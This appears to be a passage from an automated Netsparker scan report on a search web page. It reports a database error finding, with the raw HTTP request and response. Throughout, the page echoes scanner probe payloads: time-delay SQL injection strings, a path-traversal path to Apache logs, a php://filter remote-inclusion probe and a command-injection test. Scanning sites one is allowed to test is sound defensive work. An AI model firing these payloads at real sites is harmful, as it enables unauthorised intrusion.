href="/dp/search?qry=Brown+Sugar+Cookie&qry_lnk=Brown+Sugar+Cookie&src_id=305&client_id=&product=unknown&serv=web&subproduct=site&version=&it=-1&step=2&rs_prev=xss&serv=web">Brown Sugar Cookie</a></p><p><a href="/dp/search?qry=Hack+Yahoo+ID&qry_lnk=Hack+Yahoo+ID&src_id=305&client_id=&product=unknown&serv=web&subproduct=site&version=&it=-1&step=2&rs_prev=xss&serv=web">Hack Yahoo ID</a></p><p><a href="/dp/search?qry=Learn+to+Hack&qry_lnk=Learn+to+Hack&src_id=305&client_id=&product=unknown&serv=web&subproduct=site&version=&it=-1&step=2&rs_prev=xss&serv=web">Learn to Hack</a></p><p><a href="/dp/search?qry=Easy+Cookie+Recipe&qry_lnk=Easy+Cookie+Recipe&src_id=305&client_id=&product=unknown&serv=web&subproduct=site&version=&it=-1&step=2&rs_prev=xss&serv=web">Easy Cookie Recipe</a></p><p><a href="/dp/search?qry=Wireless+Network+Hack&qry_lnk=Wireless+Network+Hack&src_id=305&client_id=&product=unknown&serv=web&subproduct=site&version=&it=-1&step=2&rs_prev=xss&serv=web">Wireless Network Hack</a></p><br><div id="ms-1" class="ms"><h1>Personalize your home page with local weather, news, and more!</h1><h2>Go to <a href="http://my.starware.com?src_id=305">my.starware.com</a></h2></div></div><div id="c-2" class="c"><div id="sp-3" class="sp b"><h1>Sponsored Results for <b>xss</b></h1><div><p class="t"><a href="http://www.google.com/aclk?sa=l&ai=CfeHvx2r_TZuNKsmj0AGkpLX1DvqHuhv2ycSSGLzb1cEBEAEgh6aBCCgHUPS_pP4EYMkGoAGVioL_A8gBAaoEH0_QHbQC3uxSZoUql1XwpIXRIepKa5F0OeCEZ0931E8&num=1&sig=AGiWqtzzwfqovGFh_8YRZ5VOjptgxmTwFA&adurl=http://www.infosecinstitute.com/courses/web_application_hacking_training.html%3Fas%26_kk%3Dcross%2520site%2520scripting%26_kt%3Dfce3d0fd-4e4a-4d95-a98c-770835d43a61" onmouseover="window.status='http://www.infosecinstitute.com/AppSec';return true;" onmouseout="window.status='';return true;">Web Application Hacking</a></p><p class="s"><a href="http://www.google.com/aclk?sa=l&ai=CfeHvx2r_TZuNKsmj0AGkpLX1DvqHuhv2ycSSGLzb1cEBEAEgh6aBCCgHUPS_pP4EYMkGoAGVioL_A8gBAaoEH0_QHbQC3uxSZoUql1XwpIXRIepKa5F0OeCEZ0931E8&num=1&sig=AGiWqtzzwfqovGFh_8YRZ5VOjptgxmTwFA&adurl=http://www.infosecinstitute.com/courses/web_application_hacking_training.html%3Fas%26_kk%3Dcross%2520site%2520scripting%26_kt%3Dfce3d0fd-4e4a-4d95-a98c-770835d43a61" onmouseover="window.status='http://www.infosecinstitute.com/AppSec';return true;" onmouseout="window.status='';return true;">Hands on web application hacking training. Secure J2EE and .NET</a></p><p class="h"><a href="http://www.google.com/aclk?sa=l&ai=CfeHvx2r_TZuNKsmj0AGkpLX1DvqHuhv2ycSSGLzb1cEBEAEgh6aBCCgHUPS_pP4EYMkGoAGVioL_A8gBAaoEH0_QHbQC3uxSZoUql1XwpIXRIepKa5F0OeCEZ0931E8&num=1&sig=AGiWqtzzwfqovGFh_8YRZ5VOjptgxmTwFA&adurl=http://www.infosecinstitute.com/courses/web_application_hacking_training.html%3Fas%26_kk%3Dcross%2520site%2520scripting%26_kt%3Dfce3d0fd-4e4a-4d95-a98c-770835d43a61" onmouseover="window.status='http://www.infosecinstitute.com/AppSec';return true;" onmouseout="window.status='';return true;">www.infosecinstitute.com/AppSec</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=CraKBx2r_TZuNKsmj0AGkpLX1Dtqirwe6h5a5CISlo70CEAIgh6aBCCgHUO_Tz0VgyQbIAQGqBBZP0B20At7vUmbcK6z4bSuQWO2WqVLk&num=2&sig=AGiWqtx2LjNj5qlOee-vfA7N7HixJP2nDA&adurl=http://www.peterblum.com/des/inputsecurity.aspx" onmouseover="window.status='http://www.peterblum.com';return true;" onmouseout="window.status='';return true;">ASP.NET Input Security</a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=CraKBx2r_TZuNKsmj0AGkpLX1Dtqirwe6h5a5CISlo70CEAIgh6aBCCgHUO_Tz0VgyQbIAQGqBBZP0B20At7vUmbcK6z4bSuQWO2WqVLk&num=2&sig=AGiWqtx2LjNj5qlOee-vfA7N7HixJP2nDA&adurl=http://www.peterblum.com/des/inputsecurity.aspx" onmouseover="window.status='http://www.peterblum.com';return true;" onmouseout="window.status='';return true;">Block SQL Injection, <b>Cross-site</b> <b>scripting</b> and other website attacks</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=CraKBx2r_TZuNKsmj0AGkpLX1Dtqirwe6h5a5CISlo70CEAIgh6aBCCgHUO_Tz0VgyQbIAQGqBBZP0B20At7vUmbcK6z4bSuQWO2WqVLk&num=2&sig=AGiWqtx2LjNj5qlOee-vfA7N7HixJP2nDA&adurl=http://www.peterblum.com/des/inputsecurity.aspx" onmouseover="window.status='http://www.peterblum.com';return true;" onmouseout="window.status='';return true;">www.peterblum.com</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=CdlAix2r_TZuNKsmj0AGkpLX1DoTr45kCvIiNjCvyu-kXEAMgh6aBCCgHUPn3ncoFYMkGyAEBqgQcT9Btwhfe7lJmhSqXVfCmrI0o6kprkXQ54IRnTw&num=3&sig=AGiWqtwL6NvwTKD5Zq7B2Bx753M6WejR8Q&adurl=http://www.appsecusa.org" onmouseover="window.status='http://www.appsecusa.org';return true;" onmouseout="window.status='';return true;">OWASP AppSec USA 2011</a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=CdlAix2r_TZuNKsmj0AGkpLX1DoTr45kCvIiNjCvyu-kXEAMgh6aBCCgHUPn3ncoFYMkGyAEBqgQcT9Btwhfe7lJmhSqXVfCmrI0o6kprkXQ54IRnTw&num=3&sig=AGiWqtwL6NvwTKD5Zq7B2Bx753M6WejR8Q&adurl=http://www.appsecusa.org" onmouseover="window.status='http://www.appsecusa.org';return true;" onmouseout="window.status='';return true;">Stop cloud & mobile data breaches. September 20-23 in Minneapolis, MN.</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=CdlAix2r_TZuNKsmj0AGkpLX1DoTr45kCvIiNjCvyu-kXEAMgh6aBCCgHUPn3ncoFYMkGyAEBqgQcT9Btwhfe7lJmhSqXVfCmrI0o6kprkXQ54IRnTw&num=3&sig=AGiWqtwL6NvwTKD5Zq7B2Bx753M6WejR8Q&adurl=http://www.appsecusa.org" onmouseover="window.status='http://www.appsecusa.org';return true;" onmouseout="window.status='';return true;">www.appsecusa.org</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=l&ai=CpzKmx2r_TZuNKsmj0AGkpLX1DsTEq5AC7LeU3x6UmoMFEAQgh6aBCCgHUPTZ4AVgyQagAdzUmOYDyAEBqgQcT9AdtALe6VJmzSoCAXEArgQMVtZgE7TToju_-g&num=4&sig=AGiWqtxZJCnj9--EPkNxcG4mUTtXMpXr9g&adurl=http://fumfie.com/product/204.5/REBELXS1855K%2520,%2520%25202762B003%2520,%2520%2520XS4GBSDR110BN_Canon-EOS-Digital-Rebel-XS-_EOS_1000D_/" onmouseover="window.status='http://www.fumfie.com/';return true;" onmouseout="window.status='';return true;">EOS XS SLR Kit Sale @$439</a></p><p class="s"><a href="http://www.google.com/aclk?sa=l&ai=CpzKmx2r_TZuNKsmj0AGkpLX1DsTEq5AC7LeU3x6UmoMFEAQgh6aBCCgHUPTZ4AVgyQagAdzUmOYDyAEBqgQcT9AdtALe6VJmzSoCAXEArgQMVtZgE7TToju_-g&num=4&sig=AGiWqtxZJCnj9--EPkNxcG4mUTtXMpXr9g&adurl=http://fumfie.com/product/204.5/REBELXS1855K%2520,%2520%25202762B003%2520,%2520%2520XS4GBSDR110BN_Canon-EOS-Digital-Rebel-XS-_EOS_1000D_/" onmouseover="window.status='http://www.fumfie.com/';return true;" onmouseout="window.status='';return true;">Brand New USA Fast Shipping Save BIG w/ FumFie© Order Now!</a></p><p class="h"><a href="http://www.google.com/aclk?sa=l&ai=CpzKmx2r_TZuNKsmj0AGkpLX1DsTEq5AC7LeU3x6UmoMFEAQgh6aBCCgHUPTZ4AVgyQagAdzUmOYDyAEBqgQcT9AdtALe6VJmzSoCAXEArgQMVtZgE7TToju_-g&num=4&sig=AGiWqtxZJCnj9--EPkNxcG4mUTtXMpXr9g&adurl=http://fumfie.com/product/204.5/REBELXS1855K%2520,%2520%25202762B003%2520,%2520%2520XS4GBSDR110BN_Canon-EOS-Digital-Rebel-XS-_EOS_1000D_/" onmouseover="window.status='http://www.fumfie.com/';return true;" onmouseout="window.status='';return true;">www.fumfie.com/</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=Crz3lx2r_TZuNKsmj0AGkpLX1Drm3jrEC2aT4pCei15nIVxAFIIemgQgoB1CJ6eWF-_____8BYMkGyAEBqgQcT9BNgDXe6FJmzSpfUyQFrgQMVtZgE7TToju_-g&num=5&sig=AGiWqtxfGnQdDw-MlnB3czGaaiEK-9JKGA&adurl=http://www.ask.com/slp%3F%26q%3Dcross%2Bsite%2Bscripting%26sid%3D564baaa1-1a06-4c27-bc8b-b813c0e95243-0-us_gsb%26kwid%3D%252Bcross%2520%252Bsite%2520%252Bscripting%26cid%3D10446836753%26site%3D" onmouseover="window.status='http://www.ask.com/<b>Cross+Site+Scripting</b>';return true;" onmouseout="window.status='';return true;"><b>Cross Site Scripting</b></a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=Crz3lx2r_TZuNKsmj0AGkpLX1Drm3jrEC2aT4pCei15nIVxAFIIemgQgoB1CJ6eWF-_____8BYMkGyAEBqgQcT9BNgDXe6FJmzSpfUyQFrgQMVtZgE7TToju_-g&num=5&sig=AGiWqtxfGnQdDw-MlnB3czGaaiEK-9JKGA&adurl=http://www.ask.com/slp%3F%26q%3Dcross%2Bsite%2Bscripting%26sid%3D564baaa1-1a06-4c27-bc8b-b813c0e95243-0-us_gsb%26kwid%3D%252Bcross%2520%252Bsite%2520%252Bscripting%26cid%3D10446836753%26site%3D" onmouseover="window.status='http://www.ask.com/<b>Cross+Site+Scripting</b>';return true;" onmouseout="window.status='';return true;">Compare Brands & Find Great Prices for <b>Cross Site Scripting</b> Now!</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=Crz3lx2r_TZuNKsmj0AGkpLX1Drm3jrEC2aT4pCei15nIVxAFIIemgQgoB1CJ6eWF-_____8BYMkGyAEBqgQcT9BNgDXe6FJmzSpfUyQFrgQMVtZgE7TToju_-g&num=5&sig=AGiWqtxfGnQdDw-MlnB3czGaaiEK-9JKGA&adurl=http://www.ask.com/slp%3F%26q%3Dcross%2Bsite%2Bscripting%26sid%3D564baaa1-1a06-4c27-bc8b-b813c0e95243-0-us_gsb%26kwid%3D%252Bcross%2520%252Bsite%2520%252Bscripting%26cid%3D10446836753%26site%3D" onmouseover="window.status='http://www.ask.com/<b>Cross+Site+Scripting</b>';return true;" onmouseout="window.status='';return true;">www.ask.com/<b>Cross+Site+Scripting</b></a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=COEkUx2r_TZuNKsmj0AGkpLX1DqX9pbUC3bC5nTL-hIALEAYgh6aBCCgHULKr6uoFYMkGyAEBqgQWT9AdtALe61Jm3Cus-G0rkFjtlqlS5A&num=6&sig=AGiWqtyFH9_RCp8aGGCkKxim2gboSfRKTA&adurl=http://www.amway.com/kaindia" onmouseover="window.status='http://www.amway.com/kaindia';return true;" onmouseout="window.status='';return true;">Get Healthy Inside n Out</a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=COEkUx2r_TZuNKsmj0AGkpLX1DqX9pbUC3bC5nTL-hIALEAYgh6aBCCgHULKr6uoFYMkGyAEBqgQWT9AdtALe61Jm3Cus-G0rkFjtlqlS5A&num=6&sig=AGiWqtyFH9_RCp8aGGCkKxim2gboSfRKTA&adurl=http://www.amway.com/kaindia" onmouseover="window.status='http://www.amway.com/kaindia';return true;" onmouseout="window.status='';return true;">Exlusive high quality Health, Fitness n Beauty products. 10% Off</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=COEkUx2r_TZuNKsmj0AGkpLX1DqX9pbUC3bC5nTL-hIALEAYgh6aBCCgHULKr6uoFYMkGyAEBqgQWT9AdtALe61Jm3Cus-G0rkFjtlqlS5A&num=6&sig=AGiWqtyFH9_RCp8aGGCkKxim2gboSfRKTA&adurl=http://www.amway.com/kaindia" onmouseover="window.status='http://www.amway.com/kaindia';return true;" onmouseout="window.status='';return true;">www.amway.com/kaindia</a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=CJERTx2r_TZuNKsmj0AGkpLX1Ds7s4dkB7J3xwg_O6vIPEAcgh6aBCCgHUMuYxYL5_____wFgyQbIAQGqBBxP0H2sPt7qUmbNKgR2WxmuBAxW1mATtNOiO7_6&num=7&ggladgrp=416374914&gglcreat=4069686294&sig=AGiWqtwfFpgLRzu3zTqfxd9G0dU35lpbSg&adurl=http://126.xg4ken.com/media/redir.php%..
Database Error Message
Database Error Message
Netsparker identified a database error message.
Impact
The error message may disclose sensitive information and this information can be used by an attacker to mount new attacks or to enlarge the attack surface. In rare conditions this may be a clue for an SQL Injection vulnerability. Most of the time Netsparker will detect and report that problem separately.
Do not provide any error messages on production environments. Save error messages with a reference number to a backend storage such as a text file or database, then show this number and a static user-friendly error message to the user.
Parameters
Parameter
Type
Value
qry
GET
php://filter//resource=http://netsparker.com/n?
qry_lnk
GET
xss
src_id
GET
305
client_id
GET
3
product
GET
unknown
serv
GET
web
subproduct
GET
site
version
GET
3
it
GET
-1
step
GET
2
start
GET
10
paid_pg
GET
3
ov_xargs
GET
3
ov_dmxargs
GET
3
Request
GET /dp/search?qry=php://filter//resource=http://netsparker.com/n?%00&qry_lnk=xss&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=2&start=10&paid_pg=3&ov_xargs=3&ov_dmxargs=3 HTTP/1.1 Referer: http://as.starware.com/dp/search?src_id=305&client_id=&product=unknown&serv=web&version=&it=-1&step=1&subproduct=site&qry=xss User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322) Cache-Control: no-cache Host: as.starware.com Cookie: prefs=searchHistory%3D1308584696-18-1-Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vdmFyL2xvZy9hcGFjaGUyL2Vycm8%3D%2C1308584697-2-1-SGFjaw%3D%3D%2C1308584698-12-1-KHNlbGVjdCBzbGVlcCgyNSkpYS0tIDE%3D%2C1308584699-0--Jyk7V0FJVEZPUiBERUxBWSAnMDowOjI1Jy0t%2C1308584701-0--MSBucz1uZXRzcGFya2VyKDB4MDAwMTAzKSA%3D%2C1308584702-0--MSkpO0RFQ0xBUkUvKiovQHgvKiovY2hhcig5KTtTRVQvKiovQHg9Y2hhcig0OCkrY2g%3D%2C1308584704-0--MTtERUNMQVJFLyoqL0B4LyoqL2NoYXIoOSk7U0VULyoqL0B4PWNoYXIoNDgpK2NoYXI%3D%2C1308584707-0--MScgfHwgKHNlbGVjdCBkYm1zX3BpcGUucmVjZWl2ZV9tZXNzYWdlKChjaHIoOTUpfHw%3D%2C1308584710-0--U0VUIC9BIDB4RkZGOTk5OS0yICY%3D%2C1308584711-7-1-eHNz%3B Accept-Encoding: gzip, deflate
Response
HTTP/1.1 200 OK Date: Mon, 20 Jun 2011 15:45:14 GMT Server: Apache Expires: Mon, 26 Jul 1997 05:00:00 GMT Last-Modified: Mon, 20 Jun 2011 15:45:14 GMT Pragma: no-cache Set-Cookie: prefs=searchHistory%3D1308584697-2-1-SGFjaw%3D%3D%2C1308584698-12-1-KHNlbGVjdCBzbGVlcCgyNSkpYS0tIDE%3D%2C1308584699-0--Jyk7V0FJVEZPUiBERUxBWSAnMDowOjI1Jy0t%2C1308584701-0--MSBucz1uZXRzcGFya2VyKDB4MDAwMTAzKSA%3D%2C1308584702-0--MSkpO0RFQ0xBUkUvKiovQHgvKiovY2hhcig5KTtTRVQvKiovQHg9Y2hhcig0OCkrY2g%3D%2C1308584704-0--MTtERUNMQVJFLyoqL0B4LyoqL2NoYXIoOSk7U0VULyoqL0B4PWNoYXIoNDgpK2NoYXI%3D%2C1308584707-0--MScgfHwgKHNlbGVjdCBkYm1zX3BpcGUucmVjZWl2ZV9tZXNzYWdlKChjaHIoOTUpfHw%3D%2C1308584710-0--U0VUIC9BIDB4RkZGOTk5OS0yICY%3D%2C1308584711-7-1-eHNz%2C1308584714-2-1-cGhwOi8vZmlsdGVyLy9yZXNvdXJjZT1odHRwOi8vbmV0c3Bhcmtlci5jb20vbj8A%3B; expires=Fri, 01-Jan-2038 05:00:00 GMT; path=/; domain=.starware.com Content-Encoding: Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><base href="http://as.starware.com"></base><title>Starware php://filter//resource=http://netsparker... Search Results</title><style type="text/css"> @import "http://as.starware.com/dp/content/starware/search/search.css?750"; @import "http://as.starware.com/dp/content/generic/search/pb.css?750"; </style><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/util.js?750"></script><script language="javascript" type="text/javascript" src="http://as.starware.com/dp/content/acme/javascript/Sniffer.js?750"></script><script language="javascript" type="text/javascript">var js_src_id = '305'; function doLoad() { // empty } function isAlreadyHP() { if (document.getElementById("ms-1")) { if (sniffer.isIE()) { if (!document.getElementById("hp").isHomePage('http://my.starware.com/?src_id=' + js_src_id)) { document.getElementById("ms-1").style.display = "block"; } } else { document.getElementById("ms-1").style.display = "block"; } } }//isAlreadyHP function trim(str) { return str.replace(/^\s*|\s*$/g,""); } function validateSearch(form) { form = document.getElementById(form); if (trim(form.qry.value)=="") return false; return true; }</script></head><body onload="ff(); isAlreadyHP()"><span xmlns="" id="hp" style="behavior:url(#default#homepage)"></span><div xmlns="" id="mh"><a href="http://my.starware.com/dp/startpage"><img src="/dp_content/starware/startpage/themes/default/img/star_search.png" blanksrc="/dp_content/starware/startpage/themes/default/img/blank.gif" pngsrc="/dp_content/starware/startpage/themes/default/img/star_search.png" width="295" height="41" alt="Starware" class="br png"></a><div class="sh" id="sh:1" style="bottom:30px"><div class="shl"><b>Shopping: </b><a target="_blank" href="http://rover.ebay.com/rover/1/711-53200-19255-0/1?campid=5335807172&toolid=10001&mpre=http%3A%2F%2Fsearch.ebay.com/php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00">eBay</a> | <a href="http://www.amazon.com/exec/obidos/external-search?search-type=ss&tag=cometsearch-20&mode=blended&keyword=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00" target="_blank">Amazon</a></div></div><div class="sf" id="sf:1" style="bottom:0px"><form id="searchh" action="http://as.starware.com/dp/search" method="get" onSubmit="return validateSearch('searchh');"><input name="src_id" type="hidden" value="305"><input name="client_id" type="hidden" value="3"><input name="product" type="hidden" value="unknown"><input name="serv" type="hidden" value="web"><input name="version" type="hidden" value="3"><input name="it" type="hidden" value="-1"><input name="step" type="hidden" value="3"><input name="subproduct" type="hidden" value="site"><ul><li><b>Search</b></li><li><input type="text" name="qry" value="php://filter//resource=http://netsparker..." class="t" maxlength="120"></li><li><input type="submit" value="Find It" class="b"></li><li><a href="/dp/search?src_id=305&product=prefs&bookmark=L2RwL3NlYXJjaD9xcnk9cGhwOi8vZmlsdGVyLy9yZXNvdXJjZT1odHRwOi8vbmV0c3Bhcmtlci5jb20vbj8lMDAmcXJ5X2xuaz14c3Mmc3JjX2lkPTMwNSZjbGllbnRfaWQ9MyZwcm9kdWN0PXVua25vd24mc2Vydj13ZWImc3VicHJvZHVjdD1zaXRlJnZlcnNpb249MyZpdD0tMSZzdGVwPTImc3RhcnQ9MTAmcGFpZF9wZz0zJm92X3hhcmdzPTMmb3ZfZG14YXJncz0z">Preferences</a></li></ul></form></div></div><div xmlns="" id="c-0"><div id="c-1" class="c"><div id="sp-1" class="sp b"></div><h1>Related</h1><p><a href="/dp/search?qry=PHP&qry_lnk=PHP&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00&serv=web">PHP</a></p><p><a href="/dp/search?qry=PHP+Report+Generator&qry_lnk=PHP+Report+Generator&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00&serv=web">PHP Report Generator</a></p><p><a href="/dp/search?qry=Learn+PHP+Tutorial&qry_lnk=Learn+PHP+Tutorial&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00&serv=web">Learn PHP Tutorial</a></p><p><a href="/dp/search?qry=Cursos+PHP+5&qry_lnk=Cursos+PHP+5&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00&serv=web">Cursos PHP 5</a></p><p><a href="/dp/search?qry=PHP+Website+Design&qry_lnk=PHP+Website+Design&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00&serv=web">PHP Website Design</a></p><p><a href="/dp/search?qry=PHP+Download+File&qry_lnk=PHP+Download+File&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00&serv=web">PHP Download File</a></p><p><a href="/dp/search?qry=PHP+Application+Variables&qry_lnk=PHP+Application+Variables&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00&serv=web">PHP Application Variables</a></p><p><a href="/dp/search?qry=PHP+Eval+Performance&qry_lnk=PHP+Eval+Performance&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00&serv=web">PHP Eval Performance</a></p><p><a href="/dp/search?qry=PHP+Web+Form&qry_lnk=PHP+Web+Form&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00&serv=web">PHP Web Form</a></p><p><a href="/dp/search?qry=PHP+Development+Company&qry_lnk=PHP+Development+Company&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3&rs_prev=php%3A%2F%2Ffilter%2F%2Fresource%3Dhttp%3A%2F%2Fnetsparker.com%2Fn%3F%00&serv=web">PHP Development Company</a></p><br><h1>Recent Searches</h1><p><a href="/dp/search?qry=xss&qry_lnk=xss&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">xss</a></p><p><a href="/dp/search?qry=SET+%2FA+0xFFF9999-2+%26&qry_lnk=SET+%2FA+0xFFF9999-2+%26&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">SET /A 0xFFF9999-2 &</a></p><p><a href="/dp/search?qry=1%27+%7C%7C+%28select+dbms_pipe.receive_message%28%28chr%2895%29%7C%7C&qry_lnk=1%27+%7C%7C+%28select+dbms_pipe.receive_message%28%28chr%2895%29%7C%7C&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">1' || (select dbms_pipe.r...</a></p><p><a href="/dp/search?qry=1%3BDECLARE%2F%2A%2A%2F%40x%2F%2A%2A%2Fchar%289%29%3BSET%2F%2A%2A%2F%40x%3Dchar%2848%29%2Bchar&qry_lnk=1%3BDECLARE%2F%2A%2A%2F%40x%2F%2A%2A%2Fchar%289%29%3BSET%2F%2A%2A%2F%40x%3Dchar%2848%29%2Bchar&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">1;DECLARE/**/@x/**/char(9...</a></p><p><a href="/dp/search?qry=1%29%29%3BDECLARE%2F%2A%2A%2F%40x%2F%2A%2A%2Fchar%289%29%3BSET%2F%2A%2A%2F%40x%3Dchar%2848%29%2Bch&qry_lnk=1%29%29%3BDECLARE%2F%2A%2A%2F%40x%2F%2A%2A%2Fchar%289%29%3BSET%2F%2A%2A%2F%40x%3Dchar%2848%29%2Bch&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">1));DECLARE/**/@x/**/char...</a></p><p><a href="/dp/search?qry=1+ns%3Dnetsparker%280x000103%29+&qry_lnk=1+ns%3Dnetsparker%280x000103%29+&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">1 ns=netsparker(0x000103)...</a></p><p><a href="/dp/search?qry=%27%29%3BWAITFOR+DELAY+%270%3A0%3A25%27--&qry_lnk=%27%29%3BWAITFOR+DELAY+%270%3A0%3A25%27--&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">');WAITFOR DELAY '0:0:25'...</a></p><p><a href="/dp/search?qry=%28select+sleep%2825%29%29a--+1&qry_lnk=%28select+sleep%2825%29%29a--+1&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">(select sleep(25))a-- 1</a></p><p><a href="/dp/search?qry=Hack&qry_lnk=Hack&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">Hack</a></p><p><a href="/dp/search?qry=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Ferro&qry_lnk=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fvar%2Flog%2Fapache2%2Ferro&src_id=305&client_id=3&product=unknown&serv=web&subproduct=site&version=3&it=-1&step=3">../../../../../../../../....</a></p><br><div id="ms-1" class="ms"><h1>Personalize your home page with local weather, news, and more!</h1><h2>Go to <a href="http://my.starware.com?src_id=305">my.starware.com</a></h2></div></div><div id="c-2" class="c"><div id="sp-3" class="sp b"><h1>Sponsored Results for <b>php://filter//resource=http://netsparker...</b></h1><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=C-DxhCmv_TYyRE8Oh0AG2r4TwB4nexoMCuYrehiyzrrPZAhABIIemgQgoAlCf_O77-f____8BYMkGkAECyAEBqgQeT9DfGLlVNog-G5j-JWLACgLN7t7pnXA3TiHSoMg7&num=1&sig=AGiWqtzCR-jjG4DWCkChrURBYnqI_twYpg&adurl=http://www.buycheapr.com/us/result.jsp%3Fga%3Dus15%26q%3Dn%2Bfilter" onmouseover="window.status='http://www.buycheapr.com/N-<b>Filter</b>';return true;" onmouseout="window.status='';return true;">N <b>Filter</b> Sale</a></p><p class="s"><a href="http://www.google.com/aclk?sa=L&ai=C-DxhCmv_TYyRE8Oh0AG2r4TwB4nexoMCuYrehiyzrrPZAhABIIemgQgoAlCf_O77-f____8BYMkGkAECyAEBqgQeT9DfGLlVNog-G5j-JWLACgLN7t7pnXA3TiHSoMg7&num=1&sig=AGiWqtzCR-jjG4DWCkChrURBYnqI_twYpg&adurl=http://www.buycheapr.com/us/result.jsp%3Fga%3Dus15%26q%3Dn%2Bfilter" onmouseover="window.status='http://www.buycheapr.com/N-<b>Filter</b>';return true;" onmouseout="window.status='';return true;">All Must Go – Save Big On N <b>Filter</b> Bargains!</a></p><p class="h"><a href="http://www.google.com/aclk?sa=L&ai=C-DxhCmv_TYyRE8Oh0AG2r4TwB4nexoMCuYrehiyzrrPZAhABIIemgQgoAlCf_O77-f____8BYMkGkAECyAEBqgQeT9DfGLlVNog-G5j-JWLACgLN7t7pnXA3TiHSoMg7&num=1&sig=AGiWqtzCR-jjG4DWCkChrURBYnqI_twYpg&adurl=http://www.buycheapr.com/us/result.jsp%3Fga%3Dus15%26q%3Dn%2Bfilter" onmouseover="window.status='http://www.buycheapr.com/N-<b>Filter</b>';return true;" onmouseout="window.status='';return true;">www.buycheapr.com/N-<b>Filter</b></a></p></div><div><p class="t"><a href="http://www.google.com/aclk?sa=L&ai=ChUFoCmv_TYyRE8Oh0AG2r4TwB47z5uwBxsmGrxa7h5LyCxACIIemgQgoAlDn7Pvl_f____8BYMkGkAECyAEBqgQeT9Dfab1VNYg-G5j-JVu9ShHN7t7pnXA3TiHSoMgr&num=2&sig=AGiWqtx2sscXXP_xfNrKk-ST86F9YXiT_g&adurl=http://go.sp-ask.com/us/r5%3Fq%3Dwww%2Bresource%2Bcom%26siteid%3D14213%7C14213%7C14213%26sq%3D1" onmouseover="window.status='http://www.ask.com';return true;" onmouseout="window.status='';return true;">Www <b>Resource</b> Com</a></p><p class="s"><a 